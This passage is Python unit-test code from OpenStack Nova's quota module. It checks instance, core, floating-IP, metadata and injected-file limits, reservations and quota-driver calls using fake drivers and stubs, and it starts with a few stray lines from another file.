defer.returnValue((events, handler._latest_room_serial))
def get_current_key(self):
return self.handler()._latest_room_serial
def get_pagination_rows(self, user, pagination_config, key):
return ([], pagination_config.from_key)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from oslo.config import cfg
from nova import compute
from nova.compute import instance_types
from nova import context
from nova import db
from nova.db.sqlalchemy import api as sqa_api
from nova.db.sqlalchemy import models as sqa_models
from nova import exception
from nova.openstack.common import rpc
from nova.openstack.common import timeutils
from nova import quota
from nova.scheduler import driver as scheduler_driver
from nova import test
import nova.tests.image.fake
CONF = cfg.CONF
CONF.import_opt('scheduler_topic', 'nova.scheduler.rpcapi')
CONF.import_opt('compute_driver', 'nova.virt.driver')
class QuotaIntegrationTestCase(test.TestCase):
def setUp(self):
super(QuotaIntegrationTestCase, self).setUp()
self.flags(compute_driver='nova.virt.fake.FakeDriver',
quota_instances=2,
quota_cores=4,
quota_floating_ips=1,
network_manager='nova.network.manager.FlatDHCPManager')
# Apparently needed by the RPC tests...
self.network = self.start_service('network')
self.user_id = 'admin'
self.project_id = 'admin'
self.context = context.RequestContext(self.user_id,
self.project_id,
is_admin=True)
orig_rpc_call = rpc.call
def rpc_call_wrapper(context, topic, msg, timeout=None):
"""Stub out the scheduler creating the instance entry."""
if (topic == CONF.scheduler_topic and
msg['method'] == 'run_instance'):
scheduler = scheduler_driver.Scheduler
instance = scheduler().create_instance_db_entry(
context,
msg['args']['request_spec'],
None)
return [scheduler_driver.encode_instance(instance)]
else:
return orig_rpc_call(context, topic, msg)
self.stubs.Set(rpc, 'call', rpc_call_wrapper)
nova.tests.image.fake.stub_out_image_service(self.stubs)
def tearDown(self):
super(QuotaIntegrationTestCase, self).tearDown()
nova.tests.image.fake.FakeImageService_reset()
def _create_instance(self, cores=2):
"""Create a test instance."""
inst = {}
inst['image_id'] = 'cedef40a-ed67-4d10-800e-17455edce175'
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = self.user_id
inst['project_id'] = self.project_id
inst['instance_type_id'] = '3' # m1.large
inst['vcpus'] = cores
return db.instance_create(self.context, inst)
def test_too_many_instances(self):
instance_uuids = []
for i in range(CONF.quota_instances):
instance = self._create_instance()
instance_uuids.append(instance['uuid'])
inst_type = instance_types.get_instance_type_by_name('m1.small')
image_uuid = 'cedef40a-ed67-4d10-800e-17455edce175'
self.assertRaises(exception.QuotaError, compute.API().create,
self.context,
min_count=1,
max_count=1,
instance_type=inst_type,
image_href=image_uuid)
for instance_uuid in instance_uuids:
db.instance_destroy(self.context, instance_uuid)
def test_too_many_cores(self):
instance = self._create_instance(cores=4)
inst_type = instance_types.get_instance_type_by_name('m1.small')
image_uuid = 'cedef40a-ed67-4d10-800e-17455edce175'
self.assertRaises(exception.QuotaError, compute.API().create,
self.context,
min_count=1,
max_count=1,
instance_type=inst_type,
image_href=image_uuid)
db.instance_destroy(self.context, instance['uuid'])
def test_too_many_addresses(self):
address = '192.168.0.100'
db.floating_ip_create(context.get_admin_context(),
{'address': address,
'project_id': self.project_id})
self.assertRaises(exception.QuotaError,
self.network.allocate_floating_ip,
self.context,
self.project_id)
db.floating_ip_destroy(context.get_admin_context(), address)
def test_auto_assigned(self):
address = '192.168.0.100'
db.floating_ip_create(context.get_admin_context(),
{'address': address,
'project_id': self.project_id})
# auto allocated addresses should not be counted
self.assertRaises(exception.NoMoreFloatingIps,
self.network.allocate_floating_ip,
self.context,
self.project_id,
True)
db.floating_ip_destroy(context.get_admin_context(), address)
def test_too_many_metadata_items(self):
metadata = {}
for i in range(CONF.quota_metadata_items + 1):
metadata['key%s' % i] = 'value%s' % i
inst_type = instance_types.get_instance_type_by_name('m1.small')
image_uuid = 'cedef40a-ed67-4d10-800e-17455edce175'
self.assertRaises(exception.QuotaError, compute.API().create,
self.context,
min_count=1,
max_count=1,
instance_type=inst_type,
image_href=image_uuid,
metadata=metadata)
def _create_with_injected_files(self, files):
api = compute.API()
inst_type = instance_types.get_instance_type_by_name('m1.small')
image_uuid = 'cedef40a-ed67-4d10-800e-17455edce175'
api.create(self.context, min_count=1, max_count=1,
instance_type=inst_type, image_href=image_uuid,
injected_files=files)
def test_no_injected_files(self):
api = compute.API()
inst_type = instance_types.get_instance_type_by_name('m1.small')
image_uuid = 'cedef40a-ed67-4d10-800e-17455edce175'
api.create(self.context,
instance_type=inst_type,
image_href=image_uuid)
def test_max_injected_files(self):
files = []
for i in xrange(CONF.quota_injected_files):
files.append(('/my/path%d' % i, 'config = test\n'))
self._create_with_injected_files(files) # no QuotaError
def test_too_many_injected_files(self):
files = []
for i in xrange(CONF.quota_injected_files + 1):
files.append(('/my/path%d' % i, 'my\ncontent%d\n' % i))
self.assertRaises(exception.QuotaError,
self._create_with_injected_files, files)
def test_max_injected_file_content_bytes(self):
max = CONF.quota_injected_file_content_bytes
content = ''.join(['a' for i in xrange(max)])
files = [('/test/path', content)]
self._create_with_injected_files(files) # no QuotaError
def test_too_many_injected_file_content_bytes(self):
max = CONF.quota_injected_file_content_bytes
content = ''.join(['a' for i in xrange(max + 1)])
files = [('/test/path', content)]
self.assertRaises(exception.QuotaError,
self._create_with_injected_files, files)
def test_max_injected_file_path_bytes(self):
max = CONF.quota_injected_file_path_bytes
path = ''.join(['a' for i in xrange(max)])
files = [(path, 'config = quotatest')]
self._create_with_injected_files(files) # no QuotaError
def test_too_many_injected_file_path_bytes(self):
max = CONF.quota_injected_file_path_bytes
path = ''.join(['a' for i in xrange(max + 1)])
files = [(path, 'config = quotatest')]
self.assertRaises(exception.QuotaError,
self._create_with_injected_files, files)
def test_reservation_expire(self):
self.useFixture(test.TimeOverride())
def assertInstancesReserved(reserved):
result = quota.QUOTAS.get_project_quotas(self.context,
self.context.project_id)
self.assertEqual(result['instances']['reserved'], reserved)
quota.QUOTAS.reserve(self.context,
expire=60,
instances=2)
assertInstancesReserved(2)
timeutils.advance_time_seconds(80)
result = quota.QUOTAS.expire(self.context)
assertInstancesReserved(0)
class FakeContext(object):
def __init__(self, project_id, quota_class):
self.is_admin = False
self.user_id = 'fake_user'
self.project_id = project_id
self.quota_class = quota_class
def elevated(self):
elevated = self.__class__(self.project_id, self.quota_class)
elevated.is_admin = True
return elevated
class FakeDriver(object):
def __init__(self, by_project=None, by_class=None, reservations=None):
self.called = []
self.by_project = by_project or {}
self.by_class = by_class or {}
self.reservations = reservations or []
def get_by_project(self, context, project_id, resource):
self.called.append(('get_by_project', context, project_id, resource))
try:
return self.by_project[project_id][resource]
except KeyError:
raise exception.ProjectQuotaNotFound(project_id=project_id)
def get_by_class(self, context, quota_class, resource):
self.called.append(('get_by_class', context, quota_class, resource))
try:
return self.by_class[quota_class][resource]
except KeyError:
raise exception.QuotaClassNotFound(class_name=quota_class)
def get_defaults(self, context, resources):
self.called.append(('get_defaults', context, resources))
return resources
def get_class_quotas(self, context, resources, quota_class,
defaults=True):
self.called.append(('get_class_quotas', context, resources,
quota_class, defaults))
return resources
def get_project_quotas(self, context, resources, project_id,
quota_class=None, defaults=True, usages=True):
self.called.append(('get_project_quotas', context, resources,
project_id, quota_class, defaults, usages))
return resources
def limit_check(self, context, resources, values, project_id=None):
self.called.append(('limit_check', context, resources,
values, project_id))
def reserve(self, context, resources, deltas, expire=None,
project_id=None):
self.called.append(('reserve', context, resources, deltas,
expire, project_id))
return self.reservations
def commit(self, context, reservations, project_id=None):
self.called.append(('commit', context, reservations, project_id))
def rollback(self, context, reservations, project_id=None):
self.called.append(('rollback', context, reservations, project_id))
def usage_reset(self, context, resources):
self.called.append(('usage_reset', context, resources))
def destroy_all_by_project(self, context, project_id):
self.called.append(('destroy_all_by_project', context, project_id))
def expire(self, context):
self.called.append(('expire', context))
class BaseResourceTestCase(test.TestCase):
def test_no_flag(self):
resource = quota.BaseResource('test_resource')
self.assertEqual(resource.name, 'test_resource')
self.assertEqual(resource.flag, None)
self.assertEqual(resource.default, -1)
def test_with_flag(self):
# We know this flag exists, so use it...
self.flags(quota_instances=10)
resource = quota.BaseResource('test_resource', 'quota_instances')
self.assertEqual(resource.name, 'test_resource')
self.assertEqual(resource.flag, 'quota_instances')
self.assertEqual(resource.default, 10)
def test_with_flag_no_quota(self):
self.flags(quota_instances=-1)
resource = quota.BaseResource('test_resource', 'quota_instances')
self.assertEqual(resource.name, 'test_resource')
self.assertEqual(resource.flag, 'quota_instances')
self.assertEqual(resource.default, -1)
def test_quota_no_project_no_class(self):
self.flags(quota_instances=10)
resource = quota.BaseResource('test_resource', 'quota_instances')
driver = FakeDriver()
context = FakeContext(None, None)
quota_value = resource.quota(driver, context)
self.assertEqual(quota_value, 10)
def test_quota_with_project_no_class(self):
self.flags(quota_instances=10)
resource = quota.BaseResource('test_resource', 'quota_instances')
driver = FakeDriver(by_project=dict(
test_project=dict(test_resource=15),
))
context = FakeContext('test_project', None)
quota_value = resource.quota(driver, context)
self.assertEqual(quota_value, 15)
def test_quota_no_project_with_class(self):
self.flags(quota_instances=10)
resource = quota.BaseResource('test_resource', 'quota_instances')
driver = FakeDriver(by_class=dict(
test_class=dict(test_resource=20),
))
context = FakeContext(None, 'test_class')
quota_value = resource.quota(driver, context)
self.assertEqual(quota_value, 20)
def test_quota_with_project_with_class(self):
self.flags(quota_instances=10)
resource = quota.BaseResource('test_resource', 'quota_instances')
driver = FakeDriver(by_project=dict(
test_project=dict(test_resource=15),
),
by_class=dict(
test_class=dict(test_resource=20),
))
context = FakeContext('test_project', 'test_class')
quota_value = resource.quota(driver, context)
self.assertEqual(quota_value, 15)
def test_quota_override_project_with_class(self):
self.flags(quota_instances=10)
resource = quota.BaseResource('test_resource', 'quota_instances')
driver = FakeDriver(by_project=dict(
test_project=dict(test_resource=15),
override_project=dict(test_resource=20),
))
context = FakeContext('test_project', 'test_class')
quota_value = resource.quota(driver, context,
project_id='override_project')
self.assertEqual(quota_value, 20)
def test_quota_with_project_override_class(self):
self.flags(quota_instances=10)
resource = quota.BaseResource('test_resource', 'quota_instances')
driver = FakeDriver(by_class=dict(
test_class=dict(test_resource=15),
override_class=dict(test_resource=20),
))
context = FakeContext('test_project', 'test_class')
quota_value = resource.quota(driver, context,
quota_class='override_class')
self.assertEqual(quota_value, 20)
class QuotaEngineTestCase(test.TestCase):
def test_init(self):
quota_obj = quota.QuotaEngine()
self.assertEqual(quota_obj._resources, {})
self.assertTrue(isinstance(quota_obj._driver, quota.DbQuotaDriver))
def test_init_override_string(self):
quota_obj = quota.QuotaEngine(
quota_driver_class='nova.tests.test_quota.FakeDriver')
self.assertEqual(quota_obj._resources, {})
self.assertTrue(isinstance(quota_obj._driver, FakeDriver))
def test_init_override_obj(self):
quota_obj = quota.QuotaEngine(quota_driver_class=FakeDriver)
self.assertEqual(quota_obj._resources, {})
self.assertEqual(quota_obj._driver, FakeDriver)
def test_register_resource(self):
quota_obj = quota.QuotaEngine()
resource = quota.AbsoluteResource('test_resource')
quota_obj.register_resource(resource)
self.assertEqual(quota_obj._resources, dict(test_resource=resource))
def test_register_resources(self):
quota_obj = quota.QuotaEngine()
resources = [
quota.AbsoluteResource('test_resource1'),
quota.AbsoluteResource('test_resource2'),
quota.AbsoluteResource('test_resource3'),
]
quota_obj.register_resources(resources)
self.assertEqual(quota_obj._resources, dict(
test_resource1=resources[0],
test_resource2=resources[1],
test_resource3=resources[2],
))
def test_sync_predeclared(self):
quota_obj = quota.QuotaEngine()
def spam(*args, **kwargs):
pass
resource = quota.ReservableResource('test_resource', spam)
quota_obj.register_resource(resource)
self.assertEqual(resource.sync, spam)
def test_sync_multi(self):
quota_obj = quota.QuotaEngine()
def spam(*args, **kwargs):
pass
resources = [
quota.ReservableResource('test_resource1', spam),
quota.ReservableResource('test_resource2', spam),
quota.ReservableResource('test_resource3', spam),
quota.ReservableResource('test_resource4', spam),
]
quota_obj.register_resources(resources[:2])
self.assertEqual(resources[0].sync, spam)
self.assertEqual(resources[1].sync, spam)
self.assertEqual(resources[2].sync, spam)
self.assertEqual(resources[3].sync, spam)
def test_get_by_project(self):
context = FakeContext('test_project', 'test_class')
driver = FakeDriver(by_project=dict(
test_project=dict(test_resource=42)))
quota_obj = quota.QuotaEngine(quota_driver_class=driver)
result = quota_obj.get_by_project(context, 'test_project',
'test_resource')
self.assertEqual(driver.called, [
('get_by_project', context, 'test_project', 'test_resource'),
])
self.assertEqual(result, 42)
def test_get_by_class(self):
context = FakeContext('test_project', 'test_class')
driver = FakeDriver(by_class=dict(
test_class=dict(test_resource=42)))
quota_obj = quota.QuotaEngine(quota_driver_class=driver)
result = quota_obj.get_by_class(context, 'test_class', 'test_resource')
self.assertEqual(driver.called, [
('get_by_class', context, 'test_class', 'test_resource'),
])
self.assertEqual(result, 42)
def _make_quota_obj(self, driver):
quota_obj = quota.QuotaEngine(quota_driver_class=driver)
resources = [
quota.AbsoluteResource('test_resource4'),
quota.AbsoluteResource('test_resource3'),
quota.AbsoluteResource('test_resource2'),
quota.AbsoluteResource('test_resource1'),
]
quota_obj.register_resources(resources)
return quota_obj
def test_get_defaults(self):
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
result = quota_obj.get_defaults(context)
self.assertEqual(driver.called, [
('get_defaults', context, quota_obj._resources),
])
self.assertEqual(result, quota_obj._resources)
def test_get_class_quotas(self):
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
result1 = quota_obj.get_class_quotas(context, 'test_class')
result2 = quota_obj.get_class_quotas(context, 'test_class', False)
self.assertEqual(driver.called, [
('get_class_quotas', context, quota_obj._resources,
'test_class', True),
('get_class_quotas', context, quota_obj._resources,
'test_class', False),
])
self.assertEqual(result1, quota_obj._resources)
self.assertEqual(result2, quota_obj._resources)
def test_get_project_quotas(self):
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
result1 = quota_obj.get_project_quotas(context, 'test_project')
result2 = quota_obj.get_project_quotas(context, 'test_project',
quota_class='test_class',
defaults=False,
usages=False)
self.assertEqual(driver.called, [
('get_project_quotas', context, quota_obj._resources,
'test_project', None, True, True),
('get_project_quotas', context, quota_obj._resources,
'test_project', 'test_class', False, False),
])
self.assertEqual(result1, quota_obj._resources)
self.assertEqual(result2, quota_obj._resources)
def test_count_no_resource(self):
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
self.assertRaises(exception.QuotaResourceUnknown,
quota_obj.count, context, 'test_resource5',
True, foo='bar')
def test_count_wrong_resource(self):
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
self.assertRaises(exception.QuotaResourceUnknown,
quota_obj.count, context, 'test_resource1',
True, foo='bar')
def test_count(self):
def fake_count(context, *args, **kwargs):
self.assertEqual(args, (True,))
self.assertEqual(kwargs, dict(foo='bar'))
return 5
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
quota_obj.register_resource(quota.CountableResource('test_resource5',
fake_count))
result = quota_obj.count(context, 'test_resource5', True, foo='bar')
self.assertEqual(result, 5)
def test_limit_check(self):
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
quota_obj.limit_check(context, test_resource1=4, test_resource2=3,
test_resource3=2, test_resource4=1)
self.assertEqual(driver.called, [
('limit_check', context, quota_obj._resources, dict(
test_resource1=4,
test_resource2=3,
test_resource3=2,
test_resource4=1,
), None),
])
def test_reserve(self):
context = FakeContext(None, None)
driver = FakeDriver(reservations=[
'resv-01', 'resv-02', 'resv-03', 'resv-04',
])
quota_obj = self._make_quota_obj(driver)
result1 = quota_obj.reserve(context, test_resource1=4,
test_resource2=3, test_resource3=2,
test_resource4=1)
result2 = quota_obj.reserve(context, expire=3600,
test_resource1=1, test_resource2=2,
test_resource3=3, test_resource4=4)
result3 = quota_obj.reserve(context, project_id='fake_project',
test_resource1=1, test_resource2=2,
test_resource3=3, test_resource4=4)
self.assertEqual(driver.called, [
('reserve', context, quota_obj._resources, dict(
test_resource1=4,
test_resource2=3,
test_resource3=2,
test_resource4=1,
), None, None),
('reserve', context, quota_obj._resources, dict(
test_resource1=1,
test_resource2=2,
test_resource3=3,
test_resource4=4,
), 3600, None),
('reserve', context, quota_obj._resources, dict(
test_resource1=1,
test_resource2=2,
test_resource3=3,
test_resource4=4,
), None, 'fake_project'),
])
self.assertEqual(result1, [
'resv-01', 'resv-02', 'resv-03', 'resv-04',
])
self.assertEqual(result2, [
'resv-01', 'resv-02', 'resv-03', 'resv-04',
])
self.assertEqual(result3, [
'resv-01', 'resv-02', 'resv-03', 'resv-04',
])
def test_commit(self):
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
quota_obj.commit(context, ['resv-01', 'resv-02', 'resv-03'])
self.assertEqual(driver.called, [
('commit', context, ['resv-01', 'resv-02', 'resv-03'], None),
])
def test_rollback(self):
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
quota_obj.rollback(context, ['resv-01', 'resv-02', 'resv-03'])
self.assertEqual(driver.called, [
('rollback', context, ['resv-01', 'resv-02', 'resv-03'], None),
])
def test_usage_reset(self):
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
quota_obj.usage_reset(context, ['res1', 'res2', 'res3'])
self.assertEqual(driver.called, [
('usage_reset', context, ['res1', 'res2', 'res3']),
])
def test_destroy_all_by_project(self):
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
quota_obj.destroy_all_by_project(context, 'test_project')
self.assertEqual(driver.called, [
('destroy_all_by_project', context, 'test_project'),
])
def test_expire(self):
context = FakeContext(None, None)
driver = FakeDriver()
quota_obj = self._make_quota_obj(driver)
quota_obj.expire(context)
self.assertEqual(driver.called, [
('expire', context),
])
def test_resources(self):
quota_obj = self._make_quota_obj(None)
self.assertEqual(quota_obj.resources,
['test_resource1', 'test_resource2',
'test_resource3', 'test_resource4'])
class DbQuotaDriverTestCase(test.TestCase):
def setUp(self):
super(DbQuotaDriverTestCase, self).setUp()
self.flags(quota_instances=10,
quota_cores=20,
quota_ram=50 * 1024,
quota_floating_ips=10,
quota_fixed_ips=10,
quota_metadata_items=128,
quota_injected_files=5,
quota_injected_file_content_bytes=10 * 1024,
quota_injected_file_path_bytes=255,
quota_security_groups=10,
quota_security_group_rules=20,
reservation_expire=86400,
until_refresh=0,
max_age=0,
)
self.driver = quota.DbQuotaDriver()
self.calls = []
self.useFixture(test.TimeOverride())
def test_get_defaults(self):
# Use our pre-defined resources
result = self.driver.get_defaults(None, quota.QUOTAS._resources)
self.assertEqual(result, dict(
instances=10,
cores=20,
ram=50 * 1024,
floating_ips=10,
fixed_ips=10,
metadata_items=128,
injected_files=5,
injected_file_content_bytes=10 * 1024,
injected_file_path_bytes=255,
security_groups=10,
security_group_rules=20,
key_pairs=100,
))
def _stub_quota_class_get_all_by_name(self):
# Stub out quota_class_get_all_by_name
def fake_qcgabn(context, quota_class):
self.calls.append('quota_class_get_all_by_name')
self.assertEqual(quota_class, 'test_class')
return dict(
instances=5,
ram=25 * 1024,
metadata_items=64,
injected_file_content_bytes=5 * 1024,
)
self.stubs.Set(db, 'quota_class_get_all_by_name', fake_qcgabn)
def test_get_class_quotas(self):
self._stub_quota_class_get_all_by_name()
result = self.driver.get_class_quotas(None, quota.QUOTAS._resources,
'test_class')
self.assertEqual(self.calls, ['quota_class_get_all_by_name'])
self.assertEqual(result, dict(
instances=5,
cores=20,
ram=25 * 1024,
floating_ips=10,
fixed_ips=10,
metadata_items=64,
injected_files=5,
injected_file_content_bytes=5 * 1024,
injected_file_path_bytes=255,
security_groups=10,
security_group_rules=20,
key_pairs=100,
))
def test_get_class_quotas_no_defaults(self):
self._stub_quota_class_get_all_by_name()
result = self.driver.get_class_quotas(None, quota.QUOTAS._resources,
'test_class', False)
self.assertEqual(self.calls, ['quota_class_get_all_by_name'])
self.assertEqual(result, dict(
instances=5,
ram=25 * 1024,
metadata_items=64,
injected_file_content_bytes=5 * 1024,
))
def _stub_get_by_project(self):
def fake_qgabp(context, project_id):
self.calls.append('quota_get_all_by_project')
self.assertEqual(project_id, 'test_project')
return dict(
cores=10,
injected_files=2,
injected_file_path_bytes=127,
)
def fake_qugabp(context, project_id):
self.calls.append('quota_usage_get_all_by_project')
self.assertEqual(project_id, 'test_project')
return dict(
instances=dict(in_use=2, reserved=2),
cores=dict(in_use=4, reserved=4),
ram=dict(in_use=10 * 1024, reserved=0),
floating_ips=dict(in_use=2, reserved=0),
metadata_items=dict(in_use=0, reserved=0),
injected_files=dict(in_use=0, reserved=0),
injected_file_content_bytes=dict(in_use=0, reserved=0),
injected_file_path_bytes=dict(in_use=0, reserved=0),
)
self.stubs.Set(db, 'quota_get_all_by_project', fake_qgabp)
self.stubs.Set(db, 'quota_usage_get_all_by_project', fake_qugabp)
self._stub_quota_class_get_all_by_name()
def test_get_project_quotas(self):
self.maxDiff = None
self._stub_get_by_project()
result = self.driver.get_project_quotas(
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources, 'test_project')
self.assertEqual(self.calls, [
'quota_get_all_by_project',
'quota_usage_get_all_by_project',
'quota_class_get_all_by_name',
])
self.assertEqual(result, dict(
instances=dict(
limit=5,
in_use=2,
reserved=2,
),
cores=dict(
limit=10,
in_use=4,
reserved=4,
),
ram=dict(
limit=25 * 1024,
in_use=10 * 1024,
reserved=0,
),
floating_ips=dict(
limit=10,
in_use=2,
reserved=0,
),
fixed_ips=dict(
limit=10,
in_use=0,
reserved=0,
),
metadata_items=dict(
limit=64,
in_use=0,
reserved=0,
),
injected_files=dict(
limit=2,
in_use=0,
reserved=0,
),
injected_file_content_bytes=dict(
limit=5 * 1024,
in_use=0,
reserved=0,
),
injected_file_path_bytes=dict(
limit=127,
in_use=0,
reserved=0,
),
security_groups=dict(
limit=10,
in_use=0,
reserved=0,
),
security_group_rules=dict(
limit=20,
in_use=0,
reserved=0,
),
key_pairs=dict(
limit=100,
in_use=0,
reserved=0,
),
))
def test_get_project_quotas_alt_context_no_class(self):
self.maxDiff = None
self._stub_get_by_project()
result = self.driver.get_project_quotas(
FakeContext('other_project', 'other_class'),
quota.QUOTAS._resources, 'test_project')
self.assertEqual(self.calls, [
'quota_get_all_by_project',
'quota_usage_get_all_by_project',
])
self.assertEqual(result, dict(
instances=dict(
limit=10,
in_use=2,
reserved=2,
),
cores=dict(
limit=10,
in_use=4,
reserved=4,
),
ram=dict(
limit=50 * 1024,
in_use=10 * 1024,
reserved=0,
),
floating_ips=dict(
limit=10,
in_use=2,
reserved=0,
),
fixed_ips=dict(
limit=10,
in_use=0,
reserved=0,
),
metadata_items=dict(
limit=128,
in_use=0,
reserved=0,
),
injected_files=dict(
limit=2,
in_use=0,
reserved=0,
),
injected_file_content_bytes=dict(
limit=10 * 1024,
in_use=0,
reserved=0,
),
injected_file_path_bytes=dict(
limit=127,
in_use=0,
reserved=0,
),
security_groups=dict(
limit=10,
in_use=0,
reserved=0,
),
security_group_rules=dict(
limit=20,
in_use=0,
reserved=0,
),
key_pairs=dict(
limit=100,
in_use=0,
reserved=0,
),
))
def test_get_project_quotas_alt_context_with_class(self):
self.maxDiff = None
self._stub_get_by_project()
result = self.driver.get_project_quotas(
FakeContext('other_project', 'other_class'),
quota.QUOTAS._resources, 'test_project', quota_class='test_class')
self.assertEqual(self.calls, [
'quota_get_all_by_project',
'quota_usage_get_all_by_project',
'quota_class_get_all_by_name',
])
self.assertEqual(result, dict(
instances=dict(
limit=5,
in_use=2,
reserved=2,
),
cores=dict(
limit=10,
in_use=4,
reserved=4,
),
ram=dict(
limit=25 * 1024,
in_use=10 * 1024,
reserved=0,
),
floating_ips=dict(
limit=10,
in_use=2,
reserved=0,
),
fixed_ips=dict(
limit=10,
in_use=0,
reserved=0,
),
metadata_items=dict(
limit=64,
in_use=0,
reserved=0,
),
injected_files=dict(
limit=2,
in_use=0,
reserved=0,
),
injected_file_content_bytes=dict(
limit=5 * 1024,
in_use=0,
reserved=0,
),
injected_file_path_bytes=dict(
limit=127,
in_use=0,
reserved=0,
),
security_groups=dict(
limit=10,
in_use=0,
reserved=0,
),
security_group_rules=dict(
limit=20,
in_use=0,
reserved=0,
),
key_pairs=dict(
limit=100,
in_use=0,
reserved=0,
),
))
def test_get_project_quotas_no_defaults(self):
self._stub_get_by_project()
result = self.driver.get_project_quotas(
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources, 'test_project', defaults=False)
self.assertEqual(self.calls, [
'quota_get_all_by_project',
'quota_usage_get_all_by_project',
'quota_class_get_all_by_name',
])
self.assertEqual(result, dict(
cores=dict(
limit=10,
in_use=4,
reserved=4,
),
injected_files=dict(
limit=2,
in_use=0,
reserved=0,
),
injected_file_path_bytes=dict(
limit=127,
in_use=0,
reserved=0,
),
))
def test_get_project_quotas_no_usages(self):
self._stub_get_by_project()
result = self.driver.get_project_quotas(
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources, 'test_project', usages=False)
self.assertEqual(self.calls, [
'quota_get_all_by_project',
'quota_class_get_all_by_name',
])
self.assertEqual(result, dict(
instances=dict(
limit=5,
),
cores=dict(
limit=10,
),
ram=dict(
limit=25 * 1024,
),
floating_ips=dict(
limit=10,
),
fixed_ips=dict(
limit=10,
),
metadata_items=dict(
limit=64,
),
injected_files=dict(
limit=2,
),
injected_file_content_bytes=dict(
limit=5 * 1024,
),
injected_file_path_bytes=dict(
limit=127,
),
security_groups=dict(
limit=10,
),
security_group_rules=dict(
limit=20,
),
key_pairs=dict(
limit=100,
),
))
def _stub_get_project_quotas(self):
def fake_get_project_quotas(context, resources, project_id,
quota_class=None, defaults=True,
usages=True):
self.calls.append('get_project_quotas')
return dict((k, dict(limit=v.default))
for k, v in resources.items())
self.stubs.Set(self.driver, 'get_project_quotas',
fake_get_project_quotas)
def test_get_quotas_has_sync_unknown(self):
self._stub_get_project_quotas()
self.assertRaises(exception.QuotaResourceUnknown,
self.driver._get_quotas,
None, quota.QUOTAS._resources,
['unknown'], True)
self.assertEqual(self.calls, [])
def test_get_quotas_no_sync_unknown(self):
self._stub_get_project_quotas()
self.assertRaises(exception.QuotaResourceUnknown,
self.driver._get_quotas,
None, quota.QUOTAS._resources,
['unknown'], False)
self.assertEqual(self.calls, [])
def test_get_quotas_has_sync_no_sync_resource(self):
self._stub_get_project_quotas()
self.assertRaises(exception.QuotaResourceUnknown,
self.driver._get_quotas,
None, quota.QUOTAS._resources,
['metadata_items'], True)
self.assertEqual(self.calls, [])
def test_get_quotas_no_sync_has_sync_resource(self):
self._stub_get_project_quotas()
self.assertRaises(exception.QuotaResourceUnknown,
self.driver._get_quotas,
None, quota.QUOTAS._resources,
['instances'], False)
self.assertEqual(self.calls, [])
def test_get_quotas_has_sync(self):
self._stub_get_project_quotas()
result = self.driver._get_quotas(FakeContext('test_project',
'test_class'),
quota.QUOTAS._resources,
['instances', 'cores', 'ram',
'floating_ips', 'security_groups'],
True)
self.assertEqual(self.calls, ['get_project_quotas'])
self.assertEqual(result, dict(
instances=10,
cores=20,
ram=50 * 1024,
floating_ips=10,
security_groups=10,
))
def test_get_quotas_no_sync(self):
self._stub_get_project_quotas()
result = self.driver._get_quotas(FakeContext('test_project',
'test_class'),
quota.QUOTAS._resources,
['metadata_items', 'injected_files',
'injected_file_content_bytes',
'injected_file_path_bytes',
'security_group_rules'], False)
self.assertEqual(self.calls, ['get_project_quotas'])
self.assertEqual(result, dict(
metadata_items=128,
injected_files=5,
injected_file_content_bytes=10 * 1024,
injected_file_path_bytes=255,
security_group_rules=20,
))
def test_limit_check_under(self):
self._stub_get_project_quotas()
self.assertRaises(exception.InvalidQuotaValue,
self.driver.limit_check,
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(metadata_items=-1))
def test_limit_check_over(self):
self._stub_get_project_quotas()
self.assertRaises(exception.OverQuota,
self.driver.limit_check,
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(metadata_items=129))
def test_limit_check_unlimited(self):
self.flags(quota_metadata_items=-1)
self._stub_get_project_quotas()
self.driver.limit_check(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(metadata_items=32767))
def test_limit_check(self):
self._stub_get_project_quotas()
self.driver.limit_check(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(metadata_items=128))
def _stub_quota_reserve(self):
def fake_quota_reserve(context, resources, quotas, deltas, expire,
until_refresh, max_age, project_id=None):
self.calls.append(('quota_reserve', expire, until_refresh,
max_age))
return ['resv-1', 'resv-2', 'resv-3']
self.stubs.Set(db, 'quota_reserve', fake_quota_reserve)
def test_reserve_bad_expire(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
self.assertRaises(exception.InvalidReservationExpiration,
self.driver.reserve,
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire='invalid')
self.assertEqual(self.calls, [])
def test_reserve_default_expire(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2))
expire = timeutils.utcnow() + datetime.timedelta(seconds=86400)
self.assertEqual(self.calls, [
'get_project_quotas',
